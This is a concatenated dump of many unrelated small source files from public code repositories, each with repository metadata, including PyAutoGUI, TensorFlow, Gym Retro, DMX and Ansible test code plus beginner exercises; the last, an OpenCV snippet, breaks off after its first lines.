books/PythonAutomate/gui_automate/pyautogui_sample.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
books/PythonAutomate/gui_automate/pyautogui_sample.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
import time
import pyautogui
# 주 모니터 사이즈 얻기
screen_width, screen_height = pyautogui.size()
"""마우스"""
current_mouse_x, current_mouse_y = pyautogui.position() # 마우스 X, Y 좌표 얻기
pyautogui.moveTo(100, 150, duration=0.25) # 마우스 이동 0.25초 동안 이동
pyautogui.click() # 마우스 클릭
pyautogui.click(100, 200, duration=1) # 마우스 좌표 1초 동안 이동 후 클릭
pyautogui.click(500, 300, button="right", duration=0.25) # 마우스 오른쪽 버튼 클릭
pyautogui.click(500, 300, button="left", duration=0.25) # 마우스 왼쪽 버튼 클릭
pyautogui.click("help_icon.png") # help_icon.png 파일을 스크린 상에서 찾아 클릭
# 상대 좌표 이동
for i in range(3):
pyautogui.move(100, 0, duration=0.25) # 오른쪽
pyautogui.move(0, 100, duration=0.25) # 아래
pyautogui.move(-100, 0, duration=0.25) # 왼쪽
pyautogui.move(0, -100, duration=0.25) # 위
# 마우스 끌기
pyautogui.click() # 현재 윈도우창 활성화
distance = 200
change = 20
while distance > 0:
pyautogui.drag(distance, 0, duration=0.2) # 오른쪽
distance = distance - change
pyautogui.drag(0, distance, duration=0.2) # 아래
pyautogui.drag(-distance, 0, duration=0.2) # 왼쪽
distance = distance - change
pyautogui.drag(0, -distance, duration=0.2) # 위
# 마우스 스크롤 (양수: 올리기, 음수: 내리기)
pyautogui.scroll(-100)
"""키보드"""
pyautogui.write("Hello world!", interval=0.25) # 각각의 문자마다 0.25초 간격으로 입력
pyautogui.press("esc") # Esc 입력, 키 명칭은 pyautogui.KEY_NAMES에 있음
pyautogui.keyDown("shift") # shift 키 누른 상태로 유지
pyautogui.press(["left", "left", "left", "left"]) # 왼쪽 화살표 키 4번 입력
pyautogui.keyUp("shift") # shift 키 떼기
pyautogui.hotkey("ctrl", "c") # Ctrl-C hotkey 조합 입력
pyautogui.alert("This is the message to display.") # 경고창 띄우고 OK 누를 때 까지 프로그램 중지
| 33.244898 | 80 | 0.675261 |
4978c2185db81f3c0ea3ab2b2820e34016c557b7
| 584 |
py
|
Python
|
torba/torba/tasks.py
|
mittalkartik2000/lbry-sdk
|
a07b17ec0c9c5d0a88bc730caf6ab955e0971b38
|
[
"MIT"
] | 4,076 |
2018-06-01T05:54:24.000Z
|
2022-03-07T21:05:52.000Z
|
torba/torba/tasks.py
|
mittalkartik2000/lbry-sdk
|
a07b17ec0c9c5d0a88bc730caf6ab955e0971b38
|
[
"MIT"
] | 80 |
2018-06-14T01:02:03.000Z
|
2019-06-19T10:45:39.000Z
|
torba/torba/tasks.py
|
braveheart12/lbry-sdk
|
dc709b468f9dce60d206161785def5c7ace2b763
|
[
"MIT"
] | 20 |
2018-06-27T21:52:22.000Z
|
2022-03-08T11:25:23.000Z
|
from asyncio import Event, get_event_loop
class TaskGroup:
def __init__(self, loop=None):
self._loop = loop or get_event_loop()
self._tasks = set()
self.done = Event()
def add(self, coro):
task = self._loop.create_task(coro)
self._tasks.add(task)
self.done.clear()
task.add_done_callback(self._remove)
return task
def _remove(self, task):
self._tasks.remove(task)
len(self._tasks) < 1 and self.done.set()
def cancel(self):
for task in self._tasks:
task.cancel()
| 23.36 | 48 | 0.599315 |
b8d75f3e6a3776837c546ec4202d1c291ff9e457
| 942 |
py
|
Python
|
Python/M01_ProgrammingBasics/L03_ConditionalStatementsAdvanced/Exercises/Solutions/P03_NewHouse.py
|
todorkrastev/softuni-software-engineering
|
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
|
[
"MIT"
] | null | null | null |
Python/M01_ProgrammingBasics/L03_ConditionalStatementsAdvanced/Exercises/Solutions/P03_NewHouse.py
|
todorkrastev/softuni-software-engineering
|
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
|
[
"MIT"
] | null | null | null |
Python/M01_ProgrammingBasics/L03_ConditionalStatementsAdvanced/Exercises/Solutions/P03_NewHouse.py
|
todorkrastev/softuni-software-engineering
|
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
|
[
"MIT"
] | 1 |
2022-02-23T13:03:14.000Z
|
2022-02-23T13:03:14.000Z
|
flowers = input()
qty = int(input())
budget = int(input())
price = 0
Roses = 5
Dahlias = 3.8
Tulips = 2.8
Narcissus = 3
Gladiolus = 2.5
if flowers == "Roses":
if qty > 80:
price = Roses * qty * 0.9
else:
price = Roses * qty
elif flowers == "Dahlias":
if qty > 90:
price = Dahlias * qty * 0.85
else:
price = Dahlias * qty
elif flowers == "Tulips":
if qty > 80:
price = Tulips * qty * 0.85
else:
price = Tulips * qty
elif flowers == "Narcissus":
if qty < 120:
price = Narcissus * qty * 1.15
else:
price = Narcissus * qty
elif flowers == "Gladiolus":
if qty < 80:
price = Gladiolus * qty * 1.2
else:
price = Gladiolus * qty
if price > budget:
print(f'Not enough money, you need {price - budget:.2f} leva more.')
else:
print(f'Hey, you have a great garden with {qty} {flowers} and {budget - price:.2f} leva left.')
| 22.428571 | 99 | 0.56051 |
62786a1b62e28402836c7f170871c33f550107ef
| 4,015 |
py
|
Python
|
Gundlagen IT-Hardware/Aufgabe5u6.py
|
thieleju/studium
|
f23db7c7d2c30a2f0095cfdd25a4944c39d80d82
|
[
"MIT"
] | 2 |
2021-11-16T22:53:25.000Z
|
2021-11-17T12:30:49.000Z
|
Gundlagen IT-Hardware/Aufgabe5u6.py
|
thieleju/studium
|
f23db7c7d2c30a2f0095cfdd25a4944c39d80d82
|
[
"MIT"
] | 1 |
2022-02-23T18:56:51.000Z
|
2022-02-23T19:09:20.000Z
|
Gundlagen IT-Hardware/Aufgabe5u6.py
|
thieleju/studium
|
f23db7c7d2c30a2f0095cfdd25a4944c39d80d82
|
[
"MIT"
] | 1 |
2022-01-24T16:54:10.000Z
|
2022-01-24T16:54:10.000Z
|
#!/usr/bin/env python
import time
import explorerhat as hat
def decToBin(decimal):
binArray = [0] * 4
temp = decimal
if temp > 15 or temp < 0:
print("decimal out of bounds!")
return
# example: decimal = 5
# 1st iteration (i=3):
# binArray[3] = 5 % 2 = 1 -> [0, 0, 0, 1]
# temp = 5 / 2 = 2
# 2nd iteration (i=2):
# binArray[2] = 2 % 2 = 0 -> [0, 0, 0, 1]
# temp = 2 / 2 = 1
# 3rd iteration (i=1):
# binArray[1] = 1 % 2 = 1 -> [0, 1, 0, 1]
# temp = 1 / 2 = 0
# temp = 0 -> exit loop, binArray = [0, 1, 0, 1]
i = len(binArray) - 1 # 4-1 = 3
while temp > 0:
binArray[i] = temp % 2
temp //= 2 # double / is needed in python version 3 or greater, otherwise /= returns fractions
i -= 1
return binArray
def binToDec(binArray):
if len(binArray) > 4:
print("binArray too many elements")
return
# i is the index
# value is the value of the binArray[i]
# example: binArray = [0, 1, 0, 1] (5 in decimal)
# reverse array to [1, 0, 1, 0]
# 1st iteration (i=0):
# binArray[0] == 1 -> sum = 0 + 2^0 -> sum = 1
# 2nd iteration (i=1):
# binArray[1] == 1 -> false
# 3rd iteration (i=2):
# binArray[2] == 1 -> sum = 1 + 2^2 -> sum = 1 + 4 = 5
# 4th iteration (i=3):
# binArray[3] == 1 -> false
sum = 0
for i, value in enumerate(reversed(binArray)):
if value == 1:
sum += 2**i
return sum
def visualizeBinary(decimal):
arr = decToBin(decimal)
for i in range(4):
if arr[i] == 1:
hat.light[i].on()
elif arr[i] == 0:
hat.light[i].off()
def increaseCounter():
global counterInDec
global counterInBin
if counterInDec < 15:
counterInDec += 1
else:
counterInDec = 0
counterInBin = decToBin(counterInDec)
visualizeBinary(counterInDec)
def decreaseCounter():
global counterInDec
global counterInBin
if counterInDec > 0:
counterInDec -= 1
else:
counterInDec = 15
counterInBin = decToBin(counterInDec)
visualizeBinary(counterInDec)
def evaluateButtons(channel, event):
global nim
global counterInDec
global counterInBin
if event == 'press':
# toggle nim mode
if channel == 5:
nim = not nim
if nim == False:
# number input mode disabled
if channel == 6: # inc
increaseCounter()
if channel == 7: # dec
decreaseCounter()
if channel == 8: # reset
counterInBin = [0, 0, 0, 0]
counterInDec = 0
visualizeBinary(counterInDec)
elif nim == True:
# number input mode
if channel == 8:
nim = False
if channel <= 4:
# toggle bits
# example: button2 pressed(channel=2), binArray = [0, 0, 0, 1] (1 in decimal)
# -> counterInBin[2-1] = 1 - counterInBin[2-1]
# -> [0, 0, x, 1] is switched to...
# if x = 0: [0, 0, 0, 1] -> [0, 0, 1-0, 1] -> [0, 0, 1, 1]
# if x = 1: [0, 0, 1, 1] -> [0, 0, 1-1, 1] -> [0, 0, 0, 1]
counterInBin[channel-1] = 1 - counterInBin[channel-1]
# convert binary to decimal
counterInDec = binToDec(counterInBin)
# toggle lights on off
visualizeBinary(counterInDec)
print("Button Press on "+str(channel),
"NIM="+str(nim), counterInBin, counterInDec)
# Global variables
counterInDec = 0
counterInBin = [0, 0, 0, 0]
nim = False
hat.touch.pressed(evaluateButtons)
hat.pause()
| 27.689655 | 103 | 0.479452 |
b29c70a6632455a1a288439e0c8f3067a0014c9d
| 2,467 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/netvisor/test_pn_admin_session_timeout.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/netvisor/test_pn_admin_session_timeout.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/netvisor/test_pn_admin_session_timeout.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
# Copyright: (c) 2018, Pluribus Networks
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.plugins.modules.network.netvisor import pn_admin_session_timeout
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
from ..nvos_module import TestNvosModule
class TestAdminServiceModule(TestNvosModule):
module = pn_admin_session_timeout
def setUp(self):
self.mock_run_nvos_commands = patch('ansible_collections.community.general.plugins.modules.network.netvisor.pn_admin_session_timeout.run_cli')
self.run_nvos_commands = self.mock_run_nvos_commands.start()
def tearDown(self):
self.mock_run_nvos_commands.stop()
def run_cli_patch(self, module, cli, state_map):
if state_map['update'] == 'admin-session-timeout-modify':
results = dict(
changed=True,
cli_cmd=cli
)
module.exit_json(**results)
def load_fixtures(self, commands=None, state=None, transport='cli'):
self.run_nvos_commands.side_effect = self.run_cli_patch
def test_admin_session_timeout_modify_t1(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_timeout': '61s',
'state': 'update'})
result = self.execute_module(changed=True, state='update')
expected_cmd = ' switch sw01 admin-session-timeout-modify timeout 61s'
self.assertEqual(result['cli_cmd'], expected_cmd)
def test_admin_session_timeout_modify_t2(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_timeout': '1d',
'state': 'update'})
result = self.execute_module(changed=True, state='update')
expected_cmd = ' switch sw01 admin-session-timeout-modify timeout 1d'
self.assertEqual(result['cli_cmd'], expected_cmd)
def test_admin_session_timeout_modify_t3(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_timeout': '10d20m3h15s',
'state': 'update'})
result = self.execute_module(changed=True, state='update')
expected_cmd = ' switch sw01 admin-session-timeout-modify timeout 10d20m3h15s'
self.assertEqual(result['cli_cmd'], expected_cmd)
| 44.854545 | 150 | 0.702878 |
0c161b64aac6b7eff8ff620e776c7c359b978c52
| 264 |
pyde
|
Python
|
sketches/runningorc00/runningorc00.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 4 |
2018-06-03T02:11:46.000Z
|
2021-08-18T19:55:15.000Z
|
sketches/runningorc00/runningorc00.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | null | null | null |
sketches/runningorc00/runningorc00.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 3 |
2019-12-23T19:12:51.000Z
|
2021-04-30T14:00:31.000Z
|
# Running Orc 00
from orcs import Orc
orc = Orc(160, -48)
def setup():
global bg
bg = loadImage("field.png")
frameRate(15)
size(320, 320)
orc.loadPics()
orc.dy = 5
def draw():
background(bg)
orc.move()
orc.display()
| 13.894737 | 31 | 0.564394 |
a77fb80e23663e1e292fb097633fc97a5714a1ee
| 1,693 |
py
|
Python
|
retro/examples/discretizer.py
|
MatPoliquin/retro
|
c70c174a9818d1e97bc36e61abb4694d28fc68e1
|
[
"MIT-0",
"MIT"
] | 2,706 |
2018-04-05T18:28:50.000Z
|
2022-03-29T16:56:59.000Z
|
retro/examples/discretizer.py
|
MatPoliquin/retro
|
c70c174a9818d1e97bc36e61abb4694d28fc68e1
|
[
"MIT-0",
"MIT"
] | 242 |
2018-04-05T22:30:42.000Z
|
2022-03-19T01:55:11.000Z
|
retro/examples/discretizer.py
|
MatPoliquin/retro
|
c70c174a9818d1e97bc36e61abb4694d28fc68e1
|
[
"MIT-0",
"MIT"
] | 464 |
2018-04-05T19:10:34.000Z
|
2022-03-28T13:33:32.000Z
|
"""
Define discrete action spaces for Gym Retro environments with a limited set of button combos
"""
import gym
import numpy as np
import retro
class Discretizer(gym.ActionWrapper):
"""
Wrap a gym environment and make it use discrete actions.
Args:
combos: ordered list of lists of valid button combinations
"""
def __init__(self, env, combos):
super().__init__(env)
assert isinstance(env.action_space, gym.spaces.MultiBinary)
buttons = env.unwrapped.buttons
self._decode_discrete_action = []
for combo in combos:
arr = np.array([False] * env.action_space.n)
for button in combo:
arr[buttons.index(button)] = True
self._decode_discrete_action.append(arr)
self.action_space = gym.spaces.Discrete(len(self._decode_discrete_action))
def action(self, act):
return self._decode_discrete_action[act].copy()
class SonicDiscretizer(Discretizer):
"""
Use Sonic-specific discrete actions
based on https://github.com/openai/retro-baselines/blob/master/agents/sonic_util.py
"""
def __init__(self, env):
super().__init__(env=env, combos=[['LEFT'], ['RIGHT'], ['LEFT', 'DOWN'], ['RIGHT', 'DOWN'], ['DOWN'], ['DOWN', 'B'], ['B']])
def main():
env = retro.make(game='SonicTheHedgehog-Genesis', use_restricted_actions=retro.Actions.DISCRETE)
print('retro.Actions.DISCRETE action_space', env.action_space)
env.close()
env = retro.make(game='SonicTheHedgehog-Genesis')
env = SonicDiscretizer(env)
print('SonicDiscretizer action_space', env.action_space)
env.close()
if __name__ == '__main__':
main()
| 30.781818 | 132 | 0.666864 |
ac18b683582b4daad6d0ff2ebdf8853f6d365076
| 993 |
py
|
Python
|
Python/Exercícios_Python/060_criando_um_menu_de_opções.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Exercícios_Python/060_criando_um_menu_de_opções.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Exercícios_Python/060_criando_um_menu_de_opções.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""060 - Criando um Menu de Opções
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1ZRWz8qDYyffRbOffElSZ19QOPh6WqCEY
"""
from time import sleep
v=0
op='4'
while v!=5:
while op=='4':
n1=int(input('Digite Um Valor: '))
n2=int(input('Digite Outro Valor: '))
op=0
print('=-='*20)
op=str(input('''[1] Somar
[2] Multiplicar
[3] Maior
[4] Novos Números
[5] Sair Do Progama '''))
if op=='1':
print('A soma entre {} e {} é {}'.format(n1,n2,n1+n2))
elif op=='2':
print('A multiplicação entre {} e {} é {}'.format(n1,n2,n1*n2))
elif op=='3':
if n1>n2:
print('{} é maior que {}'.format(n1,n2))
elif n1==n2:
print('Os números são iguais')
else:
print('{} é maior que {}'.format(n2,n1))
elif op=='4':
print('Escolha os novos números')
elif op=='5':
v=5
print('Finalizando...')
sleep(3)
print('Fim do progama.')
else:
print('Valor invalido, tente novamente.')
sleep(2)
| 22.568182 | 77 | 0.623364 |
021dd5fcb717d7088251e2734e9f274420db546a
| 677 |
py
|
Python
|
vorl5-ueb2.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
vorl5-ueb2.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
vorl5-ueb2.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
# 5. Vorlesung 17.10.2020, Skript Python 4 (07_Python_04.pdf)
# Übung 2: Datei auslesen, Summen aus Artikel Anz und Einzelpreisen bilden
import re
muster = "(\d+),.*\s(\d+\.\d+)"
gesamtpreis = 0.0
qd = open("vorl5-ueb2-daten.txt","r")
for qdZeile in qd:
ergebnis = re.search(muster,qdZeile)
if ergebnis:
print("Gefunden: Artikelanzahl '"+ ergebnis.group(1)+"' und Einzelpreis '"+ ergebnis.group(2)+"'")
gesamtpreis = gesamtpreis + (float(ergebnis.group(1))*float(ergebnis.group(2)))
print("Zwischensumme: " + str(gesamtpreis))
else:
print("In dieser Zeile nichts gefunden!")
print("\n ==> Gesamtsumme = %.2f Euro" % gesamtpreis)
| 35.631579 | 106 | 0.655835 |
0c8488ca60dfe91b17ea2710a850c765a9d70947
| 1,421 |
py
|
Python
|
dmx/_open_dmx_usb.py
|
ihrigb/stagebuzzer
|
dbce1c5fa59a6f22e74d84ccc96d4d1a28a5b680
|
[
"Apache-2.0"
] | null | null | null |
dmx/_open_dmx_usb.py
|
ihrigb/stagebuzzer
|
dbce1c5fa59a6f22e74d84ccc96d4d1a28a5b680
|
[
"Apache-2.0"
] | null | null | null |
dmx/_open_dmx_usb.py
|
ihrigb/stagebuzzer
|
dbce1c5fa59a6f22e74d84ccc96d4d1a28a5b680
|
[
"Apache-2.0"
] | null | null | null |
import pyftdi.ftdi as ftdi
import threading
import time
vendor = 0x0403
product = 0x6001
class OpenDmxUsb(threading.Thread):
def __init__(self):
super().__init__()
self.baud_rate = 250000
self.data_bits = 8
self.stop_bits = 2
self.parity = 'N'
self.flow_ctrl = ''
self.rts_state = 0
self.channel_values = [0] * 513
self._init_dmx()
def _init_dmx(self):
self.ftdi = ftdi.Ftdi()
self.ftdi.open(vendor, product, 0)
self.ftdi.set_baudrate(self.baud_rate)
self.ftdi.set_line_property(self.data_bits, self.stop_bits, self.parity, break_=False)
self.ftdi.set_flowctrl(self.flow_ctrl)
self.ftdi.purge_rx_buffer()
self.ftdi.purge_tx_buffer()
self.ftdi.set_rts(self.rts_state)
def _send_dmx(self):
self.ftdi.write_data(self.channel_values)
# Need to generate two bits for break
self.ftdi.set_line_property(self.data_bits, self.stop_bits, self.parity, break_=True)
self.ftdi.set_line_property(self.data_bits, self.stop_bits, self.parity, break_=True)
self.ftdi.set_line_property(self.data_bits, self.stop_bits, self.parity, break_=False)
def set_channel_values(self, channel_values):
self.channel_values = channel_values
def run(self) -> None:
while True:
self._send_dmx()
time.sleep(0.1)
| 31.577778 | 94 | 0.65658 |
0c9417ad4274665b9aa73b50e73eb6c1a590c595
| 334 |
py
|
Python
|
musterloesungen/2.1/summe.py
|
giu/appe6-uzh-hs2018
|
204dea36be1e53594124b606cdfa044368e54726
|
[
"MIT"
] | null | null | null |
musterloesungen/2.1/summe.py
|
giu/appe6-uzh-hs2018
|
204dea36be1e53594124b606cdfa044368e54726
|
[
"MIT"
] | null | null | null |
musterloesungen/2.1/summe.py
|
giu/appe6-uzh-hs2018
|
204dea36be1e53594124b606cdfa044368e54726
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Kurs: Python: Grundlagen der Programmierung für Nicht-Informatiker
# Semester: Herbstsemester 2018
# Homepage: http://accaputo.ch/kurs/python-uzh-hs-2018/
# Author: Giuseppe Accaputo
# Aufgabe: 2.1
def summe(a,b,c):
print(a + b + c)
summe(1,2,3)
summe(1,-1,0)
summe(-1,-2,-3)
| 25.692308 | 76 | 0.622754 |
3306f16c49c2cdaedf84bb05719c3ac529a7ef39
| 329 |
py
|
Python
|
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/catalog/models.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/catalog/models.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/catalog/models.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
class Call(models.Model):
name = models.CharField(max_length=200)
matriline = models.CharField(max_length=200)
notes = models.CharField(max_length=200)
audio = models.CharField(max_length=200)
image = models.CharField(max_length=200)
duration = models.FloatField()
| 27.416667 | 48 | 0.717325 |
cc0b35c25b24c4a0e734c8f4bfed79081cf6f7e0
| 720 |
py
|
Python
|
Python/Topics/Sending-Email/06-html-attachment.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
Python/Topics/Sending-Email/06-html-attachment.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
Python/Topics/Sending-Email/06-html-attachment.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
import smtplib
import os
from email.message import EmailMessage
EMAIL_ADDRESS = os.environ.get("GMAIL_ADDRESS")
EMAIL_PASSWORD = os.environ.get("GMAIL_APP_PASS")
with smtplib.SMTP_SSL("smtp.gmail.com", 465) as smtp:
smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
reciver = "[email protected]"
msg = EmailMessage()
msg["Subject"] = "Grab dinner this weekend? 2"
msg["From"] = EMAIL_ADDRESS
msg["To"] = reciver
msg.set_content("This is plain text")
msg.add_alternative("""\
<!DOCTYPE html>
<html>
<body>
<h1 style="color:SlateGray;">This is an HTML Email!</h1>
</body>
</html>
""", subtype="html")
smtp.send_message(msg)
print(f"Email was sented to {reciver}")
| 24 | 64 | 0.676389 |
c5798f983ff9c01735215a9490ff8227cd6dca70
| 2,781 |
py
|
Python
|
Chapter5_DNN/Chapter5_6_NeuralNetworkMath/gradientsAndGraph.py
|
thisisjako/UdemyTF
|
ee4102391ed6bd50f764955f732f5740425a9209
|
[
"MIT"
] | null | null | null |
Chapter5_DNN/Chapter5_6_NeuralNetworkMath/gradientsAndGraph.py
|
thisisjako/UdemyTF
|
ee4102391ed6bd50f764955f732f5740425a9209
|
[
"MIT"
] | null | null | null |
Chapter5_DNN/Chapter5_6_NeuralNetworkMath/gradientsAndGraph.py
|
thisisjako/UdemyTF
|
ee4102391ed6bd50f764955f732f5740425a9209
|
[
"MIT"
] | null | null | null |
import os
from typing import List
from typing import Tuple
import numpy as np
import tensorflow as tf
from tensorflow.keras.callbacks import TensorBoard
from tensorflow.keras.layers import Activation
from tensorflow.keras.layers import Dense
from tensorflow.keras.losses import MeanSquaredError
from tensorflow.keras.models import Sequential
from tensorflow.keras.optimizers import Adam
LOGS_DIR = os.path.abspath("C:/Users/Jan/Dropbox/_Programmieren/UdemyTF/logs/computation/")
MODEL_LOG_DIR = os.path.join(LOGS_DIR, "gradient_model")
def get_dataset() -> Tuple[np.ndarray, np.ndarray]:
x = np.array(
[[i, i] for i in range(100)],
dtype=np.float32
)
y = np.array(
[i for i in range(100)],
dtype=np.float32
).reshape(-1, 1)
return x, y
def build_model() -> Sequential:
model = Sequential()
model.add(Dense(1, input_shape=(2,), name="hidden"))
model.add(Activation("relu", name="relu"))
model.add(Dense(1, name="output"))
model.summary()
return model
def get_gradients(
x_test: np.ndarray,
y_test: np.ndarray,
model: Sequential,
loss_object: tf.keras.losses.Loss
) -> List[Tuple[np.ndarray, np.ndarray]]:
with tf.GradientTape() as tape:
y_pred = model(x_test, training=True)
loss_value = loss_object(y_test, y_pred)
grads = tape.gradient(loss_value, model.trainable_variables)
grad_var_tuples = [
(g, w) for (g, w) in zip(grads, model.trainable_variables)
]
return grad_var_tuples
if __name__ == "__main__":
x, y = get_dataset()
model = build_model()
model.compile(
loss="mse",
optimizer=Adam(learning_rate=1e-2),
metrics=["mse"]
)
tb_callback = TensorBoard(
log_dir=MODEL_LOG_DIR,
embeddings_freq=0,
write_graph=True
)
model.fit(
x=x,
y=y,
verbose=1,
batch_size=1,
epochs=0,
callbacks=[tb_callback]
)
model.layers[0].set_weights(
[np.array([[-0.250], [1.000]]),
np.array([0.100])]
)
model.layers[2].set_weights(
[np.array([[1.250]]),
np.array([0.125])]
)
###############
### TESTING ###
###############
loss_object = MeanSquaredError()
x_test = np.array([[2, 2]])
y_test = np.array([[2]])
y_pred = model.predict(x_test)
print(f"Pred: {y_pred}")
layer_names = [
"hidden:kernel"
"hidden:bias",
"output:kernel",
"output:bias"
]
gradients = get_gradients(x_test, y_test, model, loss_object)
for name, (grads, weight) in zip(layer_names, gradients):
print(f"Name:\n{name}")
print(f"Weights:\n{weight.numpy()}")
print(f"Grads:\n{grads.numpy()}\n")
| 24.394737 | 91 | 0.613448 |
c59aa30ad222e8bde6175ed308b47d9288d6f8c9
| 484 |
pyde
|
Python
|
sketches/aquarium/aquarium.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 4 |
2018-06-03T02:11:46.000Z
|
2021-08-18T19:55:15.000Z
|
sketches/aquarium/aquarium.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | null | null | null |
sketches/aquarium/aquarium.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 3 |
2019-12-23T19:12:51.000Z
|
2021-04-30T14:00:31.000Z
|
from fish import Fish
WIDTH = 640
HEIGHT = 416
NFISHES = 15 # Anzahl der Fische
FPS = 60
fishes = []
def setup():
global bg
size(WIDTH, HEIGHT)
this.surface.setTitle(u"Jörgs kleines, bonbonbuntes Aquarium")
bg = loadImage("background.png")
for _ in range(NFISHES):
fishes.append(Fish())
frameRate(FPS)
def draw():
background(49, 197, 224) # Himmelblau
image(bg, 0, 0)
for fish in fishes:
fish.show()
fish.update()
| 18.615385 | 66 | 0.619835 |
c5e2383a33736e97cabae7f5d8ed6150518462ce
| 506 |
py
|
Python
|
source/pkgsrc/devel/gyp/patches/patch-gyptest.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/devel/gyp/patches/patch-gyptest.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/devel/gyp/patches/patch-gyptest.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-gyptest.py,v 1.4 2014/08/21 14:49:43 he Exp $
* Add NetBSD 5, 6 and 7 target
--- gyptest.py.orig 2014-07-14 14:19:50.000000000 +0000
+++ gyptest.py
@@ -219,6 +219,10 @@ def main(argv=None):
'aix5': ['make'],
'freebsd7': ['make'],
'freebsd8': ['make'],
+ 'freebsd9': ['make'],
+ 'netbsd5': ['make'],
+ 'netbsd6': ['make'],
+ 'netbsd7': ['make'],
'openbsd5': ['make'],
'cygwin': ['msvs'],
'win32': ['msvs', 'ninja'],
| 28.111111 | 60 | 0.492095 |
76af98358bbb121804e0ab09430a0eac30ea0567
| 441 |
py
|
Python
|
python/image_processing/perspective_tr.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/image_processing/perspective_tr.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/image_processing/perspective_tr.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
import cv2
import numpy as np
from matplotlib import pyplot as plt
# Perspective-correction demo: warp the quadrilateral marked by the four
# source points onto a 300x300 axis-aligned square.
img = cv2.imread('city1.jpg')
